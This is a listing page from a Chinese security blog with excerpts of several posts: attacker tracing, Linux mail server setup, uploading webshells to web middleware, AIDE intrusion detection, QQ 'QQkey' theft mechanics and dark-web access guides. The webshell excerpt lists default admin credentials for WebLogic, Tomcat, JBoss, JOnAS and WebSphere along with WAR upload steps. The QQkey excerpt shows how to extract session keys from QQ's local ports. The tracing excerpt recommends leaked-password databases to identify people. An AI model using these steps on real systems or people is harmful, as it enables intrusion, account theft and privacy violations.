在通过IP定位后技术追踪攻击者,可通过指纹库、社工库等或其他技术手段抓取到攻击者的微博账号、百度ID等信息,一般通过以下技术手段实现: 进行QQ等同名方式去搜索、进行论坛等同名方式搜索、社工库匹配等。 如ID是邮箱,则通过社工库匹配密码、以往注册信息等。 如ID是手机号,则通过手机号搜索相关注册信息,以及手机号使用者姓名等。 例如,当通过ID追踪技术手段定位到某攻击者的QQ号、QQ网名等信息,通过专业社工库可以进一步追踪攻击者使用的QQ号注册过的其它网络ID,从而获取更多攻击者信息,从而确定攻击者的真实身份。 三、攻击程序分析 攻击者如果在攻击过程中对攻击目标上传攻击程序(如钓鱼软件),可通过对攻击者上传的恶意程序进行分析,并结合IP定位、ID追踪等技术手段对攻击进行分析溯源,常用的恶意程序分析网站有: Ø  微步在线云沙箱:https://s.threatbook.cn/ Ø  Virustotal:https://www.virustotal.com/gui/home/upload Ø  火眼(https://fireeye.ijinshan.com) Ø  Anubis(http://anubis.iseclab.org) Ø  joe(http://www.joesecurity.org) 例如,当发现某攻击者利用263邮箱系统0DAY(xss漏洞)进行钓鱼攻击,通过以下方式可追踪攻击者身份: 1)对恶意程序分析 通过上传文件到https://s.threatbook.cn进行代码分析,可得到以下信息,攻击者在攻击过程使用了以下三个域名: wvwvw.aaaa.com  用来接收cookies baidu-jaaaa.com 用来存放js恶意代码,伪造图片 flashaaaa.cn 用来存放木马病毒 然后对域名进行反查 ...

    2020-09-28 1188
  • 基于Linux搭建邮箱服务

    解析你的服务器 然后用MX记录解析你的域名 一、解析生效检查 nslookup -q=mx XXXXXX.com ping XXXXXX.com 二、Postfix、Dovecot 安装 $$yum -y install postfix dovecot 三、配置 Postfix postconf -e 'myhostname = server.yourdomain.com' postconf -e 'mydestination = localhost, localhost.localdomain' postconf -e 'myorigin = $mydomain' postconf -e 'mynetworks = 127.0.0.0/8' postconf -e 'inet_interfaces = all' postconf -e 'inet_protocols = all' postconf -e 'mydestination = $myhostname, localhost.$mydomain, localhost, $mydomain' postconf -e 'home_mailbox = Maildir/' postconf -e 'smtpd_sasl_type = dovecot' postconf -e 'smtpd_sasl_path = private/auth' postconf -e 'smtpd_sasl_auth_enable = yes' postconf -e 'broken_sasl_auth_clients = yes' postconf -e 'smtpd_sasl_authenticated_header = yes' postconf -e 'smtpd_recipient_restrictions = permit_mynetworks, permit_sasl_authenticated, reject_unauth_destination' postconf -e 'smtpd_use_tls = yes' postconf -e 'smtpd_tls_cert_file = /etc/pki/dovecot/certs/dovecot.pem' postconf -e 'smtpd_tls_key_file = /etc/pki/dovecot/private/dovecot.pem' 注意:记得将 yourdomain.com 替换为你自己的域名 配置 smtps 部分邮件客户端依赖于使用 465 端口提供加密连接,所以我们修改配置,允许 Postfix 使用 465 端口发送邮件。 smtps inet n - n - - smtpd -o smtpd_tls_wrappermode=yes (注意: -o 前要保留空格) 启动 Smtp服务 $$systemctl enable postfix.service systemctl start postfix.service 配置 Dovecot ssl_cert = </etc/pki/dovecot/certs/dovecot.pem ssl_key = </etc/pki/dovecot/private/dovecot.pem protocols = imap pop3 lmtp listen = * mail_location = Maildir:~/Maildir disable_plaintext_auth = no 修改 10-master.conf unix_listener /var/spool/postfix/private/auth { mode = 0666 } 启动 Dovecot $$systemctl enable dovecot.service systemctl start dovecot.service 添加用户 useradd test 修改密码 passwd test 切换用户 su test 发信测试 echo "Mail Content" | mail -s "Mail Subject" xxxx@xxx.com ...

    2020-09-24 1095
  • 常见web中间件拿shell

    1.weblogic 后台页面:(http为7001,https为7002) Google关键字:WebLogic Server AdministrationConsole inurl:console 默认的用户名密码 1、用户名密码均为:weblogic 2、用户名密码均为:system 3、用户名密码均为:portaladmin 4、用户名密码均为:guest 上传地方: workshop> Deployments> Web应用程序> 部署新的 Web 应用程序模块… 上传war的webshell。   上传后目标模块->部署。 2.Tomcat 后台:http://172.16.102.35:8080/manager/html 默认用户名密码 tomcat tomcat 上传地方:   Deploy之后即发布成功 shell地址:http://172.16.102.35:8080/magerx/test.jsp(其中magerx为war包的名字) 3.jboss 后台:http://172.16.102.35:9990 上传地方:Deployments>Manage Deployments>Add Content Enable后即可发布 shell地址: http://172.16.102.35:8080/magerx/test.jsp 4.JOnAS 后台:http://172.16.102.35:9000/jonasAdmin/ 默认用户名密码: jadmin jonas tomcat tomcat jonas jonas 上传地方:Deployment>Web Modules (WAR)>Upload Apply之后即可发布 shell地址:http://172.16.102.35:9000/magerx/test.jsp 5.WebSphere 后台地址:https://172.16.102.35:9043/ibm/console/logon.jsp 上传地方:应用程序>新建应用程序>新建企业应用程序 接下来各种下一步,步骤4注意填好“上下文根” 完成后单击保存 回到应用程序>应用程序类型>WebSphere 企业应用程序  选中你上传的war包 这里是paxmac  点击启动 即可发布 shell地址:http://172.16.102.35:9080/paxmac/test.jsp <!– jsp文件打包,可以使用jdk/JRE自带的jar命令: 切换到要打包的文件目录 jar -cvf magerx.war  test.jsp –> ...

    2020-09-24 1029
  • 查询自己征信是否污点方法

    步骤如下: 1、打开招商银行APP(任何人都可以注册哈)  2、首页搜索:征信 点击个人信用报告查询, 验信息后24小时内会给你报告。 可以去查查自己的信用是否有问题,有无逾期问题。 成功后会给你消息通知的, 在消息**里面即可看到报告, 查询的信息还是比较准确的,征信没问题的话 以后就可以贷款买车买房了,有问题就不行哦!建议都去查一下!...

    2020-08-22 1222
  • Telegram贴纸简易教程

    1. 首先,找到我们的贴纸机器人 @Stickers ...

    2020-08-03 2853
  • 使用AIDE工具做入侵检测

    AIDE(Advanced Intrusion Detection Environment,高级入侵检测环境)是个入侵检测工具,主要用途是检查文档的完整性。 AIDE能够构造一个指定文档的数据库,他使用aide.conf作为其配置文档。AIDE数据库能够保存文档的各种属性,包括:权限(permission)、索引节点序号(inode number)、所属用户(user)、所属用户组(group)、文档大小、最后修改时间(mtime)、创建时间(ctime)、最后访问时间(atime)、增加的大小连同连接数。AIDE还能够使用下列算法:sha1、md5、rmd160、tiger,以密文形式建立每个文档的校验码或散列号。 实验目的: Aide通过检查数据文件的权限、时间、大小、哈希值等,校验数据的完整性。 使用Aide需要在数据没有被破坏前,对数据完成初始化校验,生成校验数据库文件,在被攻击后,可以使用数据库文件,快速定位被人篡改的文件。 步骤 实现此案例需要按照如下步骤进行。 步骤一:部署AIDE入侵检测系统 1)安装软件包 [root@proxy ~]# yum -y install aide 2) 修改配置文件 确定对哪些数据进行校验,如何校验数据 [root@proxy ~]# vim /etc/aide.conf @@define DBDIR /var/lib/aide                            //数据库目录 @@define LOGDIR /var/log/aide                            //日志目录 database_out=file:@@{DBDIR}/aide.db.new.gz                //数据库文件名 //一下内容为可以检查的项目(权限,用户,组,大小,哈希值等) #p:      permissions #i:      inode: #n:      number of links #u:      user #g:      group #s:      size #md5:    md5 checksum #sha1:   sha1 checksum #sha256:        sha256 checksum DATAONLY =  p n u g s acl selinux xattrs sha256 //以下内容设置需要对哪些数据进行入侵校验检查 //注意:为了校验的效率,这里将所有默认的校验目录与文件都注释 //仅保留/root目录,其他目录都注释掉 /root   DATAONLY #/boot   NORMAL                                    //对哪些目录进行什么校验 #/bin    NORMAL #/sbin   NORMAL #/lib    NORMAL #/lib64  NORMAL #/opt    NORMAL #/usr    NORMAL #!/usr/src                                        //使用[!],设置不校验的目录 #!/usr/tmp 步骤二:初始化数据库,入侵后检测 1)入侵前对数据进行校验,生成初始化数据库 [root@proxy ~]# aide --init AIDE, version 0.15.1 AIDE database at /var/lib/aide/aide.db.new.gz initialized. //生成校验数据库,数据保存在/var/lib/aide/aide.db.new.gz 2)备份数据库,将数据库文件拷贝到U盘(非必须的操作) [root@proxy ~]# cp /var/lib/aide/aide.db.new.gz   /media/ 3)入侵后检测 [root@proxy ~]# cd /var/lib/aide/ [root@proxy ~]# mv aide.db.new.gz aide.db.gz [root@proxy ~]# aide --check    //检查哪些数据发生了变化 QQ群号:979727860 点击链接加入群聊:https://jq.qq.com/?_wv=1027&amp;k=FDmmUxxL CEKNoNimQH-f1Ra94?imageView/2/w/800" title="使用AIDE工具做入侵检测" alt="使用AIDE工具做入侵检测" border="0" width="750px" height="1344px" />...

    2020-07-25 1157
  • QQkey盗号原理分析

    一、简介     QQkey是一段字符串,通过这段字符串在没有QQ登录密码的前提下你依然能够在浏览器中对别人QQ空间、邮箱等应用进行随意访问和操作。现在市面上已经有很多使用易语言编写的盗号木马,专门盗取别人的QQkey,通过QQkey改绑关联了该邮箱的Steam账号,最终达到游戏盗号的目的! 二、原理     QQkey并没有人们想象的那么神奇,它其实是腾讯为了方便用户在网页上进行快速登录而推出的一项技术,就好比下面这张图。当你在本地登录QQ客户端的时候,打开网页版QQ空间,浏览器就会检测并提示你进行快速登录(此时你是不需要另外输入QQ密码的)。当然QQ和浏览器作为2个毫不相干的应用程序,它们之间其实是不能直接进行数据交换的,QQ客户端在每次启动的时候都会在本地打开一个或多个监听端口(4300-4308),当浏览器访问某些QQ页面的时候浏览器就向QQ客户端事先开放的监听端口发送GET请求,此时QQ客户端就充当起了WEB服务器的角色,它会向浏览器返回当前本机登录QQ的详细信息,浏览器通过这些信息就能实现用户的快速登录。而QQkey就是这些信息中最重要的一个字段。 三、手动获取QQkey 1、首先在浏览器中打开QQ空间(https://qzone.qq.com/) 2、按“F12”打开浏览器开发者模式,选择“Network”,按“F5”刷新网页 3、在“Name”窗口找到以“pt_get_uins”开头的项目,复制完整的请求地址(RequestURL)  4、将URL粘贴到Postman中,添加并修改请求头 5、Send后在返回中可以获取本机登录的QQ账号和昵称等信息 6、使用获取到的QQ号和pt_local_tk修改以下URL  View Code 7、将修改后的URL填入Postman 8、从返回的Cookies中获取Clientkey  四、总结     以上我们手动获取到的Clientkey,其实就是别人经常说的QQkey了。市面上的盗号木马其实就是模拟手动的方式,利用Http的GET请求来获取然后通过邮件的方式盗取别人QQkey的。下一篇文章我会为大家介绍如何使用接口+QQkey的方式来登陆QQ空间、QQ邮箱等网页应用! ...

    2020-07-22 1676
  • 手机进暗网教程

    由于洋葱浏览器不能截图所以只能通过文本方式写教程 1.下载洋葱浏览器,进群下载 QQ群号:979727860 点击链接加入群聊:...

    2020-07-16 29416
  • 暗网安全指南|15项措施,教你如何安全的访问暗网

    如果没有取正确的预防措施,暗网可能是非常危险的地方。使用优质的防病毒软件和像样的代理,可以保持相对安全。但是,如果你想完全匿名并保护您的设备,则您将需要的更多,可以参照以下15个措施: 确保您掌握了基础知识 使用移动实时操作系统(可选) 使用代理加密您的互联网流量 从其官方网站下载Tor 采取安全预防措施 Tor浏览器中的禁止脚本 在Tor浏览器中更改安全级别 检查是否没有IP,DNS或WebRTC泄漏 使用其他匿名服务 避免登录,订阅和付款 知道你要去哪里 使用加密货币 完成后关闭所有内容 意识到您永远不会100%安全 咨询在线指南,博客,搜索引擎,聊天网站等。 1.确保您掌握了基础知识 这听起来可能很无聊。但是暗网是一个复杂的地方,很多地方都可能出错。它到处都是骗子,恶意软件和网络钓鱼网站。有时候,边做边学会更好。但是,对于暗网,这不是最佳方法。在您不了解恶意软件的工作原理之前,您最好不要不让其感染恶意软件或损失大量金钱。暗网上有太多想滥用无知的人。 这就是为什么在下载软件或开始浏览之前,准确了解要在暗网上实现的目标很重要。如果您知道自己想做什么或在暗网上发现了什么,则可以更好地做好准备: 如果您只是在寻找令人兴奋或与众不同的东西:请确保您知道如何安全地浏览暗网。 如果您试图通过比特币或其他加密货币获利:请确保您了解加密货币的工作原理,区块链是什么以及与其他用户打交道的可靠平台。 作为举报人,确保您完全匿名非常重要。暴露某些事物可能会花费您的工作,或者在某些国家中您的自由。通过尽量保持匿名,可以防止掩盖。 2.使用Live Mobile OS(可选) 在暗网,匿名是最重要的保护。不是因为暗网是非法的(不是),而是因为您越匿名,您就越安全。不幸的是,像Windows 10这样的操作系统不太适合暗网中的隐私。Windows会执行以下不利于您匿名的操作: 您的数据会不断同步:浏览器历史记录,打开的网站,应用设置和Wi-Fi热点都将被跟踪 您的设备会自动链接到第三方的唯一广告ID Cortana收集数据,例如:您的击键,搜索结果,麦克风音频消息,日历信息,音乐播放列表,甚至是您的在线购买 Microsoft可以收集各种个人数据:您的身份,密码,习惯和兴趣,用户数据,联系人和位置 如果黑客设法通过暗网进入您的系统,则所有这些信息都可能被该黑客利用。Windows中的许多设置都可以轻松关闭(尽管不是全部)。您可以通过Windows中的设置或使用诸如W10Privacy之类的精美软件来完成此操作。 与通过Windows 10在暗网上进行交流相比,更好的主意是使用Tails,Whonix,ZuesGuard或Qubes等实时移动操作系统(OS)。 3.使用代理加密您的Internet流量 即使您使用Tor浏览器,只要有足够的时间,资源和专业知识,任何人都可以追踪您的流量。实际上,Tor浏览器在2017年被发现存在漏洞,在某些情况下会泄漏真实IP地址。 对于MacOS和Linux用户,上述问题特别严重。如果这些用户采取了预防措施,也可以在后台运行代理,那么他们的真实IP地址就不会受到损害。 因此,强烈建议您在浏览暗网时除Tor之外还使用代理。 代理会加密您的网络流量,并确保您的IP地址不会受到任何黑客或政府的监视,即使Tor浏览器内部存在漏洞。 但是请注意,并非每个代理提供商都同样可靠。免费版本经常遭受服务速度慢,数据限制和安全漏洞的困扰。 4.从官方网站下载Tor 诸如Tails和Whonix之类的移动实时操作系统已经预装了Tor浏览器,因此如果使用它们,则可以跳至步骤5。对于Windows,Mac,Linux或Android用户,这很重要。 Tor浏览器是黑客和政府机构感兴趣的目标。伪造的Tor浏览器版本是为了在用户甚至访问暗网之前就破坏用户,或者在暗网中监视用户的行为。后一种方法对政府机构特别有吸引力。 因此,您应该始终从其官方网站下载Tor浏览器:https : //www.torproject.org/ 确保始终下载最新版本的浏览器,并始终保持最新。或者可以加群下载群内的tor浏览器与tor官网同步更新 QQ群号:979727860 点击链接加入群聊:...

    2020-07-11 14564

联系我们

在线咨询:点击这里给我发消息

QQ交流群:KirinBlog

工作日:8:00-23:00,节假日休息

扫码关注